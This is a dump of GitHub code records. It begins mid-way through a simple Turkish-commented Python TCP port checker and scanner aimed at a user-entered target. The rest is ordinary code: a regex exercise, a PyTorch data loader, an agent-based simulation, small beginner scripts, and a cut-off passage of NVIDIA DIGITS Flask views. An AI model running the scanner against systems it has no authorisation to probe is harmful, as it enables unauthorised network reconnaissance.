: \n target = input(\"Target Wepsite / Ip >> \")\n port = int(input(\"Port >> \"))\n try:\n s.connect((target , port)) # target ve port değerlerine bağlanıp kontrol etsin.\n print(\"Port open >> {}\".format(port))\n except:\n print(\"Port Close >> {}\".format(port))\n\nelif option == 2 : \n target = input(\"Target Wepsite / Ip >> \")\n Min = int(input(\"Minimum Port >> \")) \n Max = int(input(\"Maximum Port >> \"))\n\n for Port in range(Min , Max + 1) : # range fonksiyonu ile girilecek portların kendisi ve aralarındaki sayıları aratmasını sağladık.\n try:\n s.connect((target , Port)) # min ve max değerler ve arasındaki sayılara bağlanıp kontrol etsin.\n print(\"Port Open >> {}\".format(Port))\n break # herşey yolunda ise döngüyü bitirsin.\n except: \n print(\"Port Close >> {}\".format(Port))\n\nelse : \n print(\"error :(\")\n exit \n","repo_name":"exninee/Port-Checker-and-Port-Scanner","sub_path":"port/port.py","file_name":"port.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29252960305","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 16 11:52:13 2016\n\n@author: kuangyiyun\n\"\"\"\n\n\"\"\"Assignment: Regular Expression\"\"\"\ndocu = open(\"regex_sum_262392.txt\")\ndocu = open(\"regex_sum_42.txt\")\nresult = []\ni = 1\nfor line in docu:\n line = line.strip()\n #print (line)\n numbers = re.findall('[0-9]+', line)\n for item in numbers:\n result.append(item)\n #print (numbers)\n #print (result)\n #i = i + 1\n #if i > 20:\n #break\nnum_sum = 0\nfor i in result:\n num_sum = num_sum + int(i)\nprint (num_sum)\n ","repo_name":"kyyeve/Python-for-Informatics-Exercise","sub_path":"Assignment_Regular_Expression.py","file_name":"Assignment_Regular_Expression.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44032414728","text":"import torch\r\nimport os\r\nimport pdb\r\nimport pickle\r\nimport nltk\r\nfrom torch.utils import data\r\nfrom collections import Counter,defaultdict\r\n\r\n\r\n\r\n# 建立词表\r\ndef set_vocab(train_texts):\t\r\n\tif os.path.exists('./data/vocab.txt'): # 如果词表存在\r\n\t\twith open('./data/vocab.txt','r',encoding='utf-8') as fr:\r\n\t\t\tvocab_words = [line.strip() for line in fr.readlines()]\r\n\telse:\r\n\t\ttrain_words = []\r\n\t\tfor text in train_texts:\r\n\t\t\ttrain_words.extend(text)\r\n\r\n\t\t# 统计词频\r\n\t\tcommon_words = Counter(train_words).most_common()\r\n\t\tvocab_words = ['[UNK]','[PAD]']+[word[0] for word in common_words]\r\n\t\t# 写入词表\r\n\t\tfw = open('./data/vocab.txt','w',encoding='utf-8')\r\n\t\tfor word in vocab_words:\r\n\t\t\tfw.write(word+'\\n')\r\n\tprint('vocab loaded!')\r\n\treturn vocab_words\r\n\r\n\r\n# 加载数据,生成迭代器\r\ndef load_data(args):\r\n\tprint('loading datas......')\r\n\twith open('./data/data.pkl', 'rb') as inp:\r\n\t train_texts = pickle.load(inp)\r\n\t train_labels = pickle.load(inp)\r\n\t test_texts = pickle.load(inp)\r\n\t test_labels = pickle.load(inp)\r\n\r\n\tif args.pretrained: # 加载预训练词向量,使用预训练词向量的词表\r\n\t\twith open('./data/wvmodel.pkl', 'rb') as inp:\r\n\t\t wvmodel = pickle.load(inp)\r\n\t\tvocab_words = list(wvmodel.vocab.keys())\r\n\telse:\r\n\t\tvocab_words = set_vocab(train_texts)\r\n\r\n\t# word转换为idx\r\n\tword2idx = defaultdict(lambda :0) #默认为0---UNK\r\n\tfor idx, word in enumerate(vocab_words):\r\n\t\tword2idx[word] = idx \r\n\r\n\r\n\t# 取最大句长,不足的padding\r\n\ttrain_texts = [line[:args.max_len] for line in train_texts]\r\n\ttest_texts = [line[:args.max_len] for line in test_texts]\r\n\ttrain_texts = [line + ['[PAD]' for i in range(args.max_len-len(line))] for line in train_texts]\r\n\ttest_texts = [line + ['[PAD]' for i in range(args.max_len-len(line))] for line in test_texts]\r\n\r\n\t# 生成数据集,每句话对应一串数字\r\n\ttrain_datas = [[word2idx[word] for word in text] for text in train_texts]\r\n\ttest_datas = [[word2idx[word] for word in text] for text in test_texts]\r\n\r\n\ttrain_datas = torch.tensor(train_datas)\r\n\ttest_datas = torch.tensor(test_datas)\r\n\ttrain_labels = torch.tensor(train_labels)\r\n\ttest_labels = torch.tensor(test_labels)\r\n\r\n\r\n\ttrain_datasets = data.TensorDataset(train_datas,train_labels)\r\n\ttest_datasets = data.TensorDataset(test_datas,test_labels)\r\n\r\n\t# 生成迭代器\r\n\ttrain_iter = data.DataLoader(train_datasets,args.batch_size,shuffle=True,num_workers=2)\r\n\ttest_iter = data.DataLoader(test_datasets,args.batch_size,shuffle=True,num_workers=2)\r\n\r\n\r\n\tprint('datas loaded!')\r\n\treturn train_iter,test_iter,vocab_words\r\n\r\n\r\n ","repo_name":"HuihuiChyan/BJTUNLP_Practice2020","sub_path":"text_classification/20125185/data_process2.py","file_name":"data_process2.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"48"} +{"seq_id":"5284845185","text":"from .agent import *\n\nclass AntiAgent(Agent):\n def __init__(self, unique_id, group, model, fac=None, fMove=None, falign=None):\n super().__init__(unique_id, model, group)\n self.payoff = 0\n coop = random.random()\n self.firstMove = fMove if fMove is not None else coop\n self.biased_coop_level = self.firstMove\n self.prevAct = {}\n self.faction = fac\n \n self.wealth = 1000 # Around 3 times \n # self.wealth = 230 # 30% of avg observed\n mu = 0.5\n sigma = 0.2\n self.fac_align = falign if falign is not None else random.gauss(mu, sigma)\n self.bias = random.gauss(mu, sigma)\n if (self.fac_align < 0):\n self.fac_align = 0\n elif(self.fac_align > 1):\n self.fac_align = 1\n\n if (self.bias < 0):\n self.bias = 0\n elif(self.bias > 1):\n self.bias = 1\n \n # Keeping track of difference updates\n self.fac_diff = []\n self.payoff_diff_lst = []\n\n def getPayoff(self):\n return self.payoff\n \n def getBias(self, other_agent_group):\n if (other_agent_group == self.group_id):\n return self.bias #2\n else:\n return 0\n \n def getFaction(self):\n return self.faction\n\n def getWealth(self):\n return self.wealth\n \n def getSocialStatus(self):\n return self.current_social_status\n \n def setFaction(self, fact):\n self.faction = fact\n\n def recieveBroadcast(self, bias_value, against_group):\n return 0\n\n def isAnti(self):\n return True\n\n def getGroupsBiasedAgainst(self):\n return [self.group_id]\n\t\n def getFactionAlignment(self, lalal):\n return 0\n\n\n\n def getOpinion(self, other_agent): \n if(self.group_id != other_agent.getGroupId()):\n if(other_agent.getId() in self.prevAct):\n unbiased_coop = mean(self.prevAct.get(other_agent.getId()))\n else:\n unbiased_coop = self.firstMove\n \n return unbiased_coop\n \n else:\n if(other_agent.getId() in self.prevAct):\n unbiased_coop = mean(self.prevAct.get(other_agent.getId()))\n else:\n unbiased_coop = self.firstMove\n \n biased_coop = (1 - self.bias) * unbiased_coop\n # self.coop_level = self.prevAct.get(other_agent.getId(), self.firstMove)\n return round(biased_coop, 2)\n\n def getCoop(self, other_agent):\n self.biased_coop_level = self.getOpinion(other_agent)\n return self.biased_coop_level\n\n\n\n def updateTheta(self, other_agent, coop, payoff_self):\n self.payoff += payoff_self\n self.interactions.append(payoff_self)\n\n agentMemorySize = 10\n\n maxPayoff = 5\n # minPayoff = 0\n \n biasIncreaseThreshold = 0.45\n biasDecreaseThreshold = 0.35\n biasDelta = 0.005\n\n facAlignIncreaseThreshold, facAlignDecreaseThreshold = facalignCalc(self.fac_align)\n facAlignDelta = 0.005\n \n # BiasUpdation\n self.payoff_diff_lst.append(payoff_self)\n if(payoff_self >= (biasIncreaseThreshold * maxPayoff)):\n self.bias = self.bias + biasDelta\n if(self.bias > 1):\n self.bias = 1\n\n if(payoff_self < (biasDecreaseThreshold * maxPayoff)):\n self.bias = self.bias - biasDelta\n if(self.bias < 0):\n self.bias = 0\n \n # FactionAlignmentUpdation\n # if (self.faction != None):\n # self.fac_diff.append(abs(self.bias - self.faction.getFacBias(self)))\n # if(abs(self.bias - self.faction.getFacBias(self)) < facAlignIncreaseThreshold):\n # self.fac_align = self.fac_align + facAlignDelta\n # if(self.fac_align > 1):\n # self.fac_align = 1\n \n # elif(abs(self.bias - self.faction.getFacBias(self)) > facAlignDecreaseThreshold):\n # self.fac_align = self.fac_align - facAlignDelta\n # if(self.fac_align < 0):\n # self.fac_align = 0\n \n if(other_agent.getId() in self.prevAct):\n experience_lst = self.prevAct.get(other_agent.getId())\n if(len(experience_lst) < agentMemorySize):\n experience_lst.append(coop)\n else:\n experience_lst.pop(0)\n experience_lst.append(coop)\n else:\n self.prevAct.update({other_agent.getId(): [coop]})\n\n","repo_name":"deep-inder/prejudice_model","sub_path":"nGroups/antiAgent.py","file_name":"antiAgent.py","file_ext":"py","file_size_in_byte":4579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"49623671","text":"# George Orwell Novels = GON\n# lower case = lc\nslots = [\"Mon am\", \"Mon pm\", \"Tue am\", \"Tue pm\", \"Wed am\", \"Wed pm\", \"Thu am\", \"Thu pm\", \"Fri am\", \"Fri pm\"]\nlc_slots = [ x.lower() for x in slots]\nslots_range = len(slots)-1\nprompt = \":> \"\nselected_slot_1 = \"\"\nselected_slot_2 = \"\"\ninput_matched = False\n\n\n\n\nprint(\"Please pick a time for your session: \")\nfor i in range (0,slots_range):\n print(f\"{slots[i]}\")\nlc_user_input = input(prompt).lower()\n\nday = lc_user_input.split(' ', 1)\nday_2_char = day[2:]\n\nprint(lc_user_input)\nprint(day_2_char)\n\nif day in lc_slots:\n app_day = day\nelse:\n for i in range(0,slots_range):\n if day_2_char in lc_slots[i]:\n #print(\"Did you mean:\", GON[i], \" Y/N?\")\n user_answer = input(prompt)\n if user_answer == \"Y\" or \"y\":\n\n input_matched = True\n","repo_name":"keith-taylor/The-Hard-Way","sub_path":"ex38_appoinments.py","file_name":"ex38_appoinments.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38957210624","text":"# 백준 10996번 문제. 별 찍기 - 21\n# running time 80ms\nN = int(input())\n\nlst1 = [' ' for i in range(N)]\nlst2 = [' ' for i in range(N)]\n\nfor i in range(N):\n if N == 0:\n print('*')\n else:\n for j in range(N):\n if j % 2 == 0:\n lst1[j] = '*'\n else:\n lst2[j] = '*'\nfor x in range(N):\n for y in range(N):\n print(lst1[y], end='')\n print()\n for y in range(N):\n print(lst2[y], end='')\n print()\n\n\"\"\"\n다른 분들의 코드\n#1\nnum = input()\nnum = int(num)\nmessage_1 = ''\nmessage_2 = ''\nfor count_1 in range(num-int(num/2)):\n\tmessage_1 += '* '\nfor count_2 in range(int(num/2)):\n\tmessage_2 += ' *'\nfor count in range(num):\n\tprint(message_1 + '\\n' + message_2)\n*과 공백을 묶어서 running time을 56ms로 줄였다.\n\n#2\nn=int(input())\nprint(('* '*((n+1)//2)+'\\n'+' *'*(n//2)+'\\n')*n,end='')\n\n*과 공백을 묶은 것��� 위와 같지만,\n// 연산자를 활용해 더욱 짧은 코드와 가장 짧은 running time(52ms)으로 해결했다.\n\"\"\"\n","repo_name":"Min-h-96/PS","sub_path":"Python/실습1/10996.py","file_name":"10996.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74584335824","text":"from __future__ import absolute_import\n\nimport os\nimport re\nimport tempfile\n\nimport flask\nimport werkzeug.exceptions\n\nfrom .forms import GenericImageModelForm\nfrom .job import GenericImageModelJob\nfrom digits.pretrained_model.job import PretrainedModelJob\nfrom digits import extensions, frameworks, utils\nfrom digits.config import config_value\nfrom digits.dataset import GenericDatasetJob, GenericImageDatasetJob\nfrom digits.inference import ImageInferenceJob\nfrom digits.status import Status\nfrom digits.utils import filesystem as fs\nfrom digits.utils import constants\nfrom digits.utils.forms import fill_form_if_cloned, save_form_to_job\nfrom digits.utils.routing import request_wants_json, job_from_request\nfrom digits.webapp import scheduler\n\nblueprint = flask.Blueprint(__name__, __name__)\n\n\n@blueprint.route('/new', methods=['GET'])\n@blueprint.route('/new/', methods=['GET'])\n@utils.auth.requires_login\ndef new(extension_id=None):\n \"\"\"\n Return a form for a new GenericImageModelJob\n \"\"\"\n form = GenericImageModelForm()\n form.dataset.choices = get_datasets(extension_id)\n form.standard_networks.choices = []\n form.previous_networks.choices = get_previous_networks()\n form.pretrained_networks.choices = get_pretrained_networks()\n prev_network_snapshots = get_previous_network_snapshots()\n\n # Is there a request to clone a job with ?clone=\n fill_form_if_cloned(form)\n\n return flask.render_template(\n 'models/images/generic/new.html',\n extension_id=extension_id,\n extension_title=extensions.data.get_extension(extension_id).get_title() if extension_id else None,\n form=form,\n frameworks=frameworks.get_frameworks(),\n previous_network_snapshots=prev_network_snapshots,\n previous_networks_fullinfo=get_previous_networks_fulldetails(),\n pretrained_networks_fullinfo=get_pretrained_networks_fulldetails(),\n multi_gpu=config_value('caffe')['multi_gpu'],\n )\n\n\n@blueprint.route('/json', methods=['POST'])\n@blueprint.route('', methods=['POST'], strict_slashes=False)\n@blueprint.route('/json', methods=['POST'])\n@blueprint.route('', methods=['POST'], strict_slashes=False)\n@utils.auth.requires_login(redirect=False)\ndef create(extension_id=None):\n \"\"\"\n Create a new GenericImageModelJob\n\n Returns JSON when requested: {job_id,name,status} or {errors:[]}\n \"\"\"\n form = GenericImageModelForm()\n form.dataset.choices = get_datasets(extension_id)\n form.standard_networks.choices = []\n form.previous_networks.choices = get_previous_networks()\n form.pretrained_networks.choices = get_pretrained_networks()\n\n prev_network_snapshots = get_previous_network_snapshots()\n\n # Is there a request to clone a job with ?clone=\n fill_form_if_cloned(form)\n\n if not form.validate_on_submit():\n if request_wants_json():\n return flask.jsonify({'errors': form.errors}), 400\n else:\n return flask.render_template(\n 'models/images/generic/new.html',\n extension_id=extension_id,\n extension_title=extensions.data.get_extension(extension_id).get_title() if extension_id else None,\n form=form,\n frameworks=frameworks.get_frameworks(),\n previous_network_snapshots=prev_network_snapshots,\n previous_networks_fullinfo=get_previous_networks_fulldetails(),\n pretrained_networks_fullinfo=get_pretrained_networks_fulldetails(),\n multi_gpu=config_value('caffe')['multi_gpu'],\n ), 400\n\n datasetJob = scheduler.get_job(form.dataset.data)\n if not datasetJob:\n raise werkzeug.exceptions.BadRequest(\n 'Unknown dataset job_id \"%s\"' % form.dataset.data)\n\n # sweeps will be a list of the the permutations of swept fields\n # Get swept learning_rate\n sweeps = [{'learning_rate': v} for v in form.learning_rate.data]\n add_learning_rate = len(form.learning_rate.data) > 1\n\n # Add swept batch_size\n sweeps = [dict(s.items() + [('batch_size', bs)]) for bs in form.batch_size.data for s in sweeps[:]]\n add_batch_size = len(form.batch_size.data) > 1\n n_jobs = len(sweeps)\n\n jobs = []\n for sweep in sweeps:\n # Populate the form with swept data to be used in saving and\n # launching jobs.\n form.learning_rate.data = sweep['learning_rate']\n form.batch_size.data = sweep['batch_size']\n\n # Augment Job Name\n extra = ''\n if add_learning_rate:\n extra += ' learning_rate:%s' % str(form.learning_rate.data[0])\n if add_batch_size:\n extra += ' batch_size:%d' % form.batch_size.data[0]\n\n job = None\n try:\n job = GenericImageModelJob(\n username=utils.auth.get_username(),\n name=form.model_name.data + extra,\n group=form.group_name.data,\n dataset_id=datasetJob.id(),\n )\n\n # get framework (hard-coded to caffe for now)\n fw = frameworks.get_framework_by_id(form.framework.data)\n\n pretrained_model = None\n # if form.method.data == 'standard':\n if form.method.data == 'previous':\n old_job = scheduler.get_job(form.previous_networks.data)\n if not old_job:\n raise werkzeug.exceptions.BadRequest(\n 'Job not found: %s' % form.previous_networks.data)\n\n use_same_dataset = (old_job.dataset_id == job.dataset_id)\n network = fw.get_network_from_previous(old_job.train_task().network, use_same_dataset)\n\n for choice in form.previous_networks.choices:\n if choice[0] == form.previous_networks.data:\n epoch = float(flask.request.form['%s-snapshot' % form.previous_networks.data])\n if epoch == 0:\n pass\n elif epoch == -1:\n pretrained_model = old_job.train_task().pretrained_model\n else:\n # verify snapshot exists\n pretrained_model = old_job.train_task().get_snapshot(epoch, download=True)\n if pretrained_model is None:\n raise werkzeug.exceptions.BadRequest(\n \"For the job %s, selected pretrained_model for epoch %d is invalid!\"\n % (form.previous_networks.data, epoch))\n\n # the first is the actual file if a list is returned, other should be meta data\n if isinstance(pretrained_model, list):\n pretrained_model = pretrained_model[0]\n\n if not (os.path.exists(pretrained_model)):\n raise werkzeug.exceptions.BadRequest(\n \"Pretrained_model for the selected epoch doesn't exist. \"\n \"May be deleted by another user/process. \"\n \"Please restart the server to load the correct pretrained_model details.\")\n # get logical path\n pretrained_model = old_job.train_task().get_snapshot(epoch)\n break\n elif form.method.data == 'pretrained':\n pretrained_job = scheduler.get_job(form.pretrained_networks.data)\n model_def_path = pretrained_job.get_model_def_path()\n weights_path = pretrained_job.get_weights_path()\n\n network = fw.get_network_from_path(model_def_path)\n pretrained_model = weights_path\n\n elif form.method.data == 'custom':\n network = fw.get_network_from_desc(form.custom_network.data)\n pretrained_model = form.custom_network_snapshot.data.strip()\n else:\n raise werkzeug.exceptions.BadRequest(\n 'Unrecognized method: \"%s\"' % form.method.data)\n\n policy = {'policy': form.lr_policy.data}\n if form.lr_policy.data == 'fixed':\n pass\n elif form.lr_policy.data == 'step':\n policy['stepsize'] = form.lr_step_size.data\n policy['gamma'] = form.lr_step_gamma.data\n elif form.lr_policy.data == 'multistep':\n policy['stepvalue'] = form.lr_multistep_values.data\n policy['gamma'] = form.lr_multistep_gamma.data\n elif form.lr_policy.data == 'exp':\n policy['gamma'] = form.lr_exp_gamma.data\n elif form.lr_policy.data == 'inv':\n policy['gamma'] = form.lr_inv_gamma.data\n policy['power'] = form.lr_inv_power.data\n elif form.lr_policy.data == 'poly':\n policy['power'] = form.lr_poly_power.data\n elif form.lr_policy.data == 'sigmoid':\n policy['stepsize'] = form.lr_sigmoid_step.data\n policy['gamma'] = form.lr_sigmoid_gamma.data\n else:\n raise werkzeug.exceptions.BadRequest(\n 'Invalid learning rate policy')\n\n if config_value('caffe')['multi_gpu']:\n if form.select_gpu_count.data:\n gpu_count = form.select_gpu_count.data\n selected_gpus = None\n else:\n selected_gpus = [str(gpu) for gpu in form.select_gpus.data]\n gpu_count = None\n else:\n if form.select_gpu.data == 'next':\n gpu_count = 1\n selected_gpus = None\n else:\n selected_gpus = [str(form.select_gpu.data)]\n gpu_count = None\n\n # Set up data augmentation structure\n data_aug = {}\n data_aug['flip'] = form.aug_flip.data\n data_aug['quad_rot'] = form.aug_quad_rot.data\n data_aug['rot'] = form.aug_rot.data\n data_aug['scale'] = form.aug_scale.data\n data_aug['noise'] = form.aug_noise.data\n data_aug['contrast'] = form.aug_contrast.data\n data_aug['whitening'] = form.aug_whitening.data\n data_aug['hsv_use'] = form.aug_hsv_use.data\n data_aug['hsv_h'] = form.aug_hsv_h.data\n data_aug['hsv_s'] = form.aug_hsv_s.data\n data_aug['hsv_v'] = form.aug_hsv_v.data\n\n # Python Layer File may be on the server or copied from the client.\n fs.copy_python_layer_file(\n bool(form.python_layer_from_client.data),\n job.dir(),\n (flask.request.files[form.python_layer_client_file.name]\n if form.python_layer_client_file.name in flask.request.files\n else ''), form.python_layer_server_file.data)\n\n job.tasks.append(fw.create_train_task(\n job=job,\n dataset=datasetJob,\n train_epochs=form.train_epochs.data,\n snapshot_interval=form.snapshot_interval.data,\n learning_rate=form.learning_rate.data[0],\n lr_policy=policy,\n gpu_count=gpu_count,\n selected_gpus=selected_gpus,\n batch_size=form.batch_size.data[0],\n batch_accumulation=form.batch_accumulation.data,\n val_interval=form.val_interval.data,\n traces_interval=form.traces_interval.data,\n pretrained_model=pretrained_model,\n crop_size=form.crop_size.data,\n use_mean=form.use_mean.data,\n network=network,\n random_seed=form.random_seed.data,\n solver_type=form.solver_type.data,\n rms_decay=form.rms_decay.data,\n shuffle=form.shuffle.data,\n data_aug=data_aug,\n )\n )\n\n # Save form data with the job so we can easily clone it later.\n save_form_to_job(job, form)\n\n jobs.append(job)\n scheduler.add_job(job)\n if n_jobs == 1:\n if request_wants_json():\n return flask.jsonify(job.json_dict())\n else:\n return flask.redirect(flask.url_for('digits.model.views.show', job_id=job.id()))\n\n except:\n if job:\n scheduler.delete_job(job)\n raise\n\n if request_wants_json():\n return flask.jsonify(jobs=[j.json_dict() for j in jobs])\n\n # If there are multiple jobs launched, go to the home page.\n return flask.redirect('/')\n\n\ndef show(job, related_jobs=None):\n \"\"\"\n Called from digits.model.views.models_show()\n \"\"\"\n data_extensions = get_data_extensions()\n view_extensions = get_view_extensions()\n\n return flask.render_template(\n 'models/images/generic/show.html',\n job=job,\n data_extensions=data_extensions,\n view_extensions=view_extensions,\n related_jobs=related_jobs,\n )\n\n\n@blueprint.route('/timeline_tracing', methods=['GET'])\ndef timeline_tracing():\n \"\"\"\n Shows timeline trace of a model\n \"\"\"\n job = job_from_request()\n\n return flask.render_template('models/timeline_tracing.html', job=job)\n\n\n@blueprint.route('/large_graph', methods=['GET'])\ndef large_graph():\n \"\"\"\n Show the loss/accuracy graph, but bigger\n \"\"\"\n job = job_from_request()\n\n return flask.render_template('models/large_graph.html', job=job)\n\n\n@blueprint.route('/infer_one/json', methods=['POST'])\n@blueprint.route('/infer_one', methods=['POST', 'GET'])\ndef infer_one():\n \"\"\"\n Infer one image\n \"\"\"\n model_job = job_from_request()\n\n remove_image_path = False\n if 'image_path' in flask.request.form and flask.request.form['image_path']:\n image_path = flask.request.form['image_path']\n elif 'image_file' in flask.request.files and flask.request.files['image_file']:\n outfile = tempfile.mkstemp(suffix='.bin')\n flask.request.files['image_file'].save(outfile[1])\n image_path = outfile[1]\n os.close(outfile[0])\n remove_image_path = True\n else:\n raise werkzeug.exceptions.BadRequest('must provide image_path or image_file')\n\n epoch = None\n if 'snapshot_epoch' in flask.request.form:\n epoch = float(flask.request.form['snapshot_epoch'])\n\n layers = 'none'\n if 'show_visualizations' in flask.request.form and flask.request.form['show_visualizations']:\n layers = 'all'\n\n if 'dont_resize' in flask.request.form and flask.request.form['dont_resize']:\n resize = False\n else:\n resize = True\n\n # create inference job\n inference_job = ImageInferenceJob(\n username=utils.auth.get_username(),\n name=\"Infer One Image\",\n model=model_job,\n images=[image_path],\n epoch=epoch,\n layers=layers,\n resize=resize,\n )\n\n # schedule tasks\n scheduler.add_job(inference_job)\n\n # wait for job to complete\n inference_job.wait_completion()\n\n # retrieve inference data\n inputs, outputs, model_visualization = inference_job.get_data()\n\n # set return status code\n status_code = 500 if inference_job.status == 'E' else 200\n\n # delete job folder and remove from scheduler list\n scheduler.delete_job(inference_job)\n\n if remove_image_path:\n os.remove(image_path)\n\n if inputs is not None and len(inputs['data']) == 1:\n image = utils.image.embed_image_html(inputs['data'][0])\n visualizations, header_html, app_begin_html, app_end_html = get_inference_visualizations(\n model_job.dataset,\n inputs,\n outputs)\n inference_view_html = visualizations[0]\n else:\n image = None\n inference_view_html = None\n header_html = None\n app_begin_html = None\n app_end_html = None\n\n if request_wants_json():\n return flask.jsonify({'outputs': dict((name, blob.tolist())\n for name, blob in outputs.iteritems())}), status_code\n else:\n return flask.render_template(\n 'models/images/generic/infer_one.html',\n model_job=model_job,\n job=inference_job,\n image_src=image,\n inference_view_html=inference_view_html,\n header_html=header_html,\n app_begin_html=app_begin_html,\n app_end_html=app_end_html,\n visualizations=model_visualization,\n total_parameters=sum(v['param_count'] for v in model_visualization\n if v['vis_type'] == 'Weights'),\n ), status_code\n\n\n@blueprint.route('/infer_extension/json', methods=['POST'])\n@blueprint.route('/infer_extension', methods=['POST', 'GET'])\ndef infer_extension():\n \"\"\"\n Perform inference using the data from an extension inference form\n \"\"\"\n model_job = job_from_request()\n\n inference_db_job = None\n try:\n if 'data_extension_id' in flask.request.form:\n data_extension_id = flask.request.form['data_extension_id']\n else:\n data_extension_id = model_job.dataset.extension_id\n\n # create an inference database\n inference_db_job = create_inference_db(model_job, data_extension_id)\n db_path = inference_db_job.get_feature_db_path(constants.TEST_DB)\n\n # create database creation job\n epoch = None\n if 'snapshot_epoch' in flask.request.form:\n epoch = float(flask.request.form['snapshot_epoch'])\n\n layers = 'none'\n if 'show_visualizations' in flask.request.form and flask.request.form['show_visualizations']:\n layers = 'all'\n\n # create inference job\n inference_job = ImageInferenceJob(\n username=utils.auth.get_username(),\n name=\"Inference\",\n model=model_job,\n images=db_path,\n epoch=epoch,\n layers=layers,\n resize=False,\n )\n\n # schedule tasks\n scheduler.add_job(inference_job)\n\n # wait for job to complete\n inference_job.wait_completion()\n\n finally:\n if inference_db_job:\n scheduler.delete_job(inference_db_job)\n\n # retrieve inference data\n inputs, outputs, model_visualization = inference_job.get_data()\n\n # set return status code\n status_code = 500 if inference_job.status == 'E' else 200\n\n # delete job folder and remove from scheduler list\n scheduler.delete_job(inference_job)\n\n if outputs is not None and len(outputs) < 1:\n # an error occurred\n outputs = None\n\n if inputs is not None:\n keys = [str(idx) for idx in inputs['ids']]\n inference_views_html, header_html, app_begin_html, app_end_html = get_inference_visualizations(\n model_job.dataset,\n inputs,\n outputs)\n else:\n inference_views_html = None\n header_html = None\n keys = None\n app_begin_html = None\n app_end_html = None\n\n if request_wants_json():\n result = {}\n for i, key in enumerate(keys):\n result[key] = dict((name, blob[i].tolist()) for name, blob in outputs.iteritems())\n return flask.jsonify({'outputs': result}), status_code\n else:\n return flask.render_template(\n 'models/images/generic/infer_extension.html',\n model_job=model_job,\n job=inference_job,\n keys=keys,\n inference_views_html=inference_views_html,\n header_html=header_html,\n app_begin_html=app_begin_html,\n app_end_html=app_end_html,\n visualizations=model_visualization,\n total_parameters=sum(v['param_count'] for v in model_visualization\n if v['vis_type'] == 'Weights'),\n ), status_code\n\n\n@blueprint.route('/infer_db/json', methods=['POST'])\n@blueprint.route('/infer_db', methods=['POST', 'GET'])\ndef infer_db():\n \"\"\"\n Infer a database\n \"\"\"\n model_job = job_from_request()\n\n if 'db_path' not in flask.request.form or flask.request.form['db_path'] is None:\n raise werkzeug.exceptions.BadRequest('db_path is a required field')\n\n db_path = flask.request.form['db_path']\n\n if not os.path.exists(db_path):\n raise werkzeug.exceptions.BadRequest('DB \"%s\" does not exit' % db_path)\n\n epoch = None\n if 'snapshot_epoch' in flask.request.form:\n epoch = float(flask.request.form['snapshot_epoch'])\n\n if 'dont_resize' in flask.request.form and flask.request.form['dont_resize']:\n resize = False\n else:\n resize = True\n\n # create inference job\n inference_job = ImageInferenceJob(\n username=utils.auth.get_username(),\n name=\"Infer Many Images\",\n model=model_job,\n images=db_path,\n epoch=epoch,\n layers='none',\n resize=resize,\n )\n\n # schedule tasks\n scheduler.add_job(inference_job)\n\n # wait for job to complete\n inference_job.wait_completion()\n\n # retrieve inference data\n inputs, outputs, _ = inference_job.get_data()\n\n # set return status code\n status_code = 500 if inference_job.status == 'E' else 200\n\n # delete job folder and remove from scheduler list\n scheduler.delete_job(inference_job)\n\n if outputs is not None and len(outputs) < 1:\n # an error occurred\n outputs = None\n\n if inputs is not None:\n keys = [str(idx) for idx in inputs['ids']]\n inference_views_html, header_html, app_begin_html, app_end_html = get_inference_visualizations(\n model_job.dataset,\n inputs,\n outputs)\n else:\n inference_views_html = None\n header_html = None\n keys = None\n app_begin_html = None\n app_end_html = None\n\n if request_wants_json():\n result = {}\n for i, key in enumerate(keys):\n result[key] = dict((name, blob[i].tolist()) for name, blob in outputs.iteritems())\n return flask.jsonify({'outputs': result}), status_code\n else:\n return flask.render_template(\n 'models/images/generic/infer_db.html',\n model_job=model_job,\n job=inference_job,\n keys=keys,\n inference_views_html=inference_views_html,\n header_html=header_html,\n app_begin_html=app_begin_html,\n app_end_html=app_end_html,\n ), status_code\n\n\n@blueprint.route('/infer_many/json', methods=['POST'])\n@blueprint.route('/infer_many', methods=['POST', 'GET'])\ndef infer_many():\n \"\"\"\n Infer many images\n \"\"\"\n model_job = job_from_request()\n\n image_list = flask.request.files.get('image_list')\n if not image_list:\n raise werkzeug.exceptions.BadRequest('image_list is a required field')\n\n if 'image_folder' in flask.request.form and flask.request.form['image_folder'].strip():\n image_folder = flask.request.form['image_folder']\n if not os.path.exists(image_folder):\n raise werkzeug.exceptions.BadRequest('image_folder \"%s\" does not exit' % image_folder)\n else:\n image_folder = None\n\n if 'num_test_images' in flask.request.form and flask.request.form['num_test_images'].strip():\n num_test_images = int(flask.request.form['num_test_images'])\n else:\n num_test_images = None\n\n epoch = None\n if 'snapshot_epoch' in flask.request.form:\n epoch = float(flask.request.form['snapshot_epoch'])\n\n if 'dont_resize' in flask.request.form and flask.request.form['dont_resize']:\n resize = False\n else:\n resize = True\n\n paths = []\n\n for line in image_list.readlines():\n line = line.strip()\n if not line:\n continue\n\n path = None\n # might contain a numerical label at the end\n match = re.match(r'(.*\\S)\\s+\\d+$', line)\n if match:\n path = match.group(1)\n else:\n path = line\n\n if not utils.is_url(path) and image_folder and not os.path.isabs(path):\n path = os.path.join(image_folder, path)\n paths.append(path)\n\n if num_test_images is not None and len(paths) >= num_test_images:\n break\n\n # create inference job\n inference_job = ImageInferenceJob(\n username=utils.auth.get_username(),\n name=\"Infer Many Images\",\n model=model_job,\n images=paths,\n epoch=epoch,\n layers='none',\n resize=resize,\n )\n\n # schedule tasks\n scheduler.add_job(inference_job)\n\n # wait for job to complete\n inference_job.wait_completion()\n\n # retrieve inference data\n inputs, outputs, _ = inference_job.get_data()\n\n # set return status code\n status_code = 500 if inference_job.status == 'E' else 200\n\n # delete job folder and remove from scheduler list\n 